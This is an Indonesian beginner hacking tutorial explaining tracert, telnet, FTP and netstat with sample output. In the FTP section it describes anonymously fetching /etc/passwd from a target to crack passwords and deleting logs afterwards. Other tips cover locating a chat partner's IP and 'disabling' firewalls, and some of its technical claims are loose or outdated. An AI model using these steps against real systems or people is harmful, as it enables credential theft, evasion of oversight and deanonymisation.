Newbie tip: 'Dos' yang terakhir disebutkan adalah Denial of service yang dilancarkan oleh hacker untuk menghentikan service pada remote machine.
***********
Catatan: Jenis serangan ini dimasa lalu sering digunakan, namun saat ini pada sistem yang telah diperbarui hal tersebut tidak akan bekerja lagi.

2. Tracert

Perintah Tracert melakukan penjejakan ke remote machine. Sebelum request kita menjangkau remote machine melalui router yang berbeda diantaranya. Tool tracert (dikenal sebagai ‘traceroute’ pada unix) pada awalnya dirancang untuk mencari router mana yang mengalami masalah. Perintah tersebut menunjukkan ip address router yang dilalui request kita sebelum menjangkau remote machine. Sebagai contoh, jika saya mengetik “tracert http://www.yahoo.com/” pada dos prompt maka akan terdapat:

Tracing route to www.yahoo.akadns.net [66.218.71.87]
over a maximum of 30 hops:

1 * 2296 ms 2025 ms dialpool-210-214-55-11.maa.sify.net [210.214.55.11]
2 2446 ms 2025 ms 2301 ms dialpool-210-214-55-2.maa.sify.net [210.214.55.2]
3 1899 ms 2066 ms 2450 ms lan-202-144-32-177.maa.sify.net [202.144.32.177]
4 * 2885 ms 2749 ms lan-202-144-83-4.maa.sify.net [202.144.83.4]
5 * * * Request timed out.
6 * * * Request timed out.
7 * * * Request timed out.
8 * * * Request timed out.
9 * * * Request timed out.
10 * 3408 ms * www.yahoo.akadns.net [66.218.71.87]
11 * * * Request timed out.
12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * * * Request timed out.
16 * * * Request timed out.
17 482 ms 698 ms 624 ms w8.scd.yahoo.com [66.218.71.87]

Trace complete.

Baris pertama memberitahukan kita ip mana yang menjejaki dan kemudian jumlah hop. Jumlah hop tergantung pada jumlah server yang ada diantaranya. Setelah memulai tracing. Request pertama saya melalui sify.net (nama ISP server saya) kemudian melalui server yang berbeda dan terakhir menjangkau w8.scd.yahoo.com. Jadi kita dapat melihat berapa lama prosedurnya. Kapanpun anda membuka http://www.yahoo.com/ dalam web browser, request anda selalu melalui isp dulu (untuk mendapatkan ip dari http://www.yahoo.com/ dari daftar nama domainnya) kemudian server lain dalam jalur tersebut dan terakhir pada yahoo.

Jadi bagaimana tracert digunakan oleh para hacker. Perintah ini digunakan untuk mencari firewall dan melumpuhkannya. Tracer digunakan bersamaan dengan nmap dapat mengetahui ip sebenarnya dimana firewall terpasang, kemudian hacker tersebut akan melumpuhkannya. Untuk contoh diatas kita melihat bahwa proses tracing terhenti pada w8.scd.yahoo.com. Namun hal ini bukanlah tujuan sebenarnya. Hal itu dikarenakan dihentikan oleh firewall. Mengenai masalah firewall akan kita bahas dalam artikel tersendiri.


3. Telnet

Jika anda menggunakan windows maka ‘telnet’ merupakan hacking tool terhebat bagi anda. Sebenarnya merupakan sebuah terminal yang dapat mengakses remote machine dan menggunakan service-nya. Melalui telnet anda dapat menentukan suatu koneksi antara mesin anda dan remote machine melalui port tertentu.


***********
Newbie tip: Disini saya membicarakan tentang virtual port. Tidak secara fisik yang anda lihat dibalik CPU anda. Hanya sebagai physical port yang digunakan untuk koneksi ke hardware dan dengan cara yang sama virtual port digunakan untuk koneksi pada software. TCP/IP memiliki 65,535 virtual port.
***********
Jika anda mengentik “telnet target.com” maka anda terhubung ke target.com pada prot no. 23 (port yang menjalankan telnet service). Anda juga bisa terhubung ke suatu port lainnya dengan mengetik nomor port setelah target.com. sebagai contoh jika saya ingin terhubung ke port no. 25 (SMTP service) maka salya akan mengetik “telnet target.com 25”.
***********
Newbie tip: Setiap port menjalankan service tertentu. Untuk mendaptkan daftar service yang dijalankan pada port tertentu yang bukalah “C:\windows\services" pada notepad.
***********
Sesaat anda terhubung ke sebuah remote machine pada port tertentu, sebuah window popup telnet dengan daemon yang menjalankan port tersebut menunggu anda mengetikkan perintah. Sebagai contoh “telnet http://www.cyberspace.org/” maka seperti gambar dibawah inilah yang saya dapatkan.




Saya harus login disana dan mengetik suatu password dan saya mendapatkan linux shell prompt. Baiklah jika anda mengetikan newuser disana untuk mendapatkan sebuah LoginID dan Password. Dan stelah itu saya menyiapkan perintah untuk mengeksekusi secara remote.

Well, http://www.cyberspace.org/ memiliki server Linux. Jadi jika anda tidak familiar dengan Linux anda tidak akan mampu menggunakan service-nya.



4. FTP

FTP adalah File Transfer Protocol. Melalui ini anda dapat mendownload atau mengupload file. Dan apa yang hacker inginkan dari ini? Benar!! Tinggal mengeti “ftp target.com” dan daemon banner akan ditampilkan. Tapi disini, dengan tujuan menampilkan file transfer pertama kali anda harus login. Beberapa website mengijinkan adanya naonymous login. Contohnya mengetikkan login “anonymous” dan email-address anda sebagai password. Tentunya anda harus mengetikkan email palsu. Sekarang anda boleh mulai mendownload dan mengupload file. Namun untuk itu anda adanya suatu perintah. Pada FTP prompt anda dapat mengetikkan “?”. Maka akan ditampilkan sbb:


! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary globe mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir

Untuk mendaptkan bantuan pada berbagai perintah contohnya perintah delete, mengetikan “? Delete”. Beberapa perintah penting lainnya adalah:

1. 'pwd' to know the present directory at remote machine.
contohnya. ftp>pwd
/etc/home
2. 'lcd' to change the local directory.
contohnya. ftp>lcd C:\windows
local directory now C:\windows
3. 'cd' to change the remote directory.
contohnya. ftp>cd /etc
remote directory now /etc
4. 'mput' to send multiple files to remote machine.
contohnya. ftp>mput *.*
sends all files from C:\windows to /etc
5. 'mget' to get multiple files from remote machine.
contohnya. ftp>mget *.*
gets all files from /etc to C:\windows
6. 'open' to establish a connection with remote host.
contohnya. ftp>open www.target.com
7. 'bye' closes the connection and quits from ftp

Untuk perintah lainnya dari ftp silakan lihat help mereka.

Sekarang pada yang port FTP (prot 21) adalah membuka http://www.nosecurity.com/. Seorang hacker akan terhubung ke situs tersebut menggunakan “ftp http://www.nosecurity.com/” pada dos prompt. Kemudian dia akan mencoba login secara anonymous. Dengan anggapan bahwa http://www.nosecurity.com/ menggunakan linux server, maka hacker tersebut akan mengtikkan perintah “get /etc/apsswd” untuk mendaptkan file password dan mengcracknya. Jika anda adalah seorang hacker, maka jangan lupa untuk menghapus log tersebut.



5. netstat

Anda dapat menentukan suatu koneksi dengan remote machine pada port tertentu, hanya saat port tersebut dibuka pada remote machine. Sebagai contoh, jika anda ingin menentukan sebuah koneksi dengan http://www.target.com/ pada port 23 (telnet) maka port tersebut seharusnya terbuka pada http://www.target.com/. Dan seluruh aktifitas hacking umumnya menggunakan port yang terbuka. Mengetikkan “netstat /?” pada dos prompt memberikan:


Displays protocol statistics and current TCP/IP network connections.

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.

Opsi akan menjelaskan fungsinya masing-masing. Dan yang terpenting adalah opsi –a dan –n. Opsi –a menampilkan seluruh port yang terbuka pada mesin tersebut. Dan jika saya menggunakan opsi –n maka akan menunjukkan ip address sebagai ganti dari domain. Saya mendapatkan hal berikut ini jika saya mengetik “netstat –a” pada command prompt.


Active Connections

Proto Local Address Foreign Address State
TCP chintan:1027 0.0.0.0:0 LISTENING
TCP chintan:80 0.0.0.0:0 LISTENING
TCP chintan:135 0.0.0.0:0 LISTENING
TCP chintan:6435 0.0.0.0:0 LISTENING
TCP chintan:1025 0.0.0.0:0 LISTENING
TCP chintan:1026 0.0.0.0:0 LISTENING
TCP chintan:1028 0.0.0.0:0 LISTENING
TCP chintan:1309 0.0.0.0:0 LISTENING
TCP chintan:1310 0.0.0.0:0 LISTENING
TCP chintan:1285 rumcajs.box.sk:80 ESTABLISHED
TCP chintan:1296 l an-202-144-78-3.maa.sify.net:80 CLOSE_WAIT
TCP chintan:1297 lan-202-144-65-14.sify.net:80 ESTABLISHED
TCP chintan:1310 cdn-v13.websys.aol.com:80 ESTABLISHED
TCP chintan:1220 aiedownload.cps.intel.com:ftp ESTABLISHED

”Proto” menyatakan nama protocol tersebut, “localaddress” memberikan ipaddress kita dan port yang terbuka. “Foreign Address” menyatkaan ipaddress dengan namor port yang terhubung ke kita. “State” menyatakan pernyataan saat ini jika suatu koneksi “established” atau listening atau hanya “waiting”.

Sebagai contoh jika saya membuka http://www.yahoo.com/ maka saat saya menjalankan “netstat –a” saya akan mendapatkan masukan seperti ini:

"TCP 203.43.50.81:2034 www.yahoo.com:80 ESTABLISHED"

Komputer saya dengan ip 203.43.50.81 melalui port 2034 terhubung dengan yahoo pada port 80

*************
Newbie tip: Dengan cara ini anda bisa mendapatkan ip seseorang yang chatting dengan ada. Pertama kali jalankan “netstat –an” dan lihat dibawah foreign ip address. Sekarang mulailah private chating dengan orang lain. Juga jalankan “netstat –an” dan anda akan mendapatkan satu lagin foreign ip pada akhirnya. Inilah ip orang tersebut. *************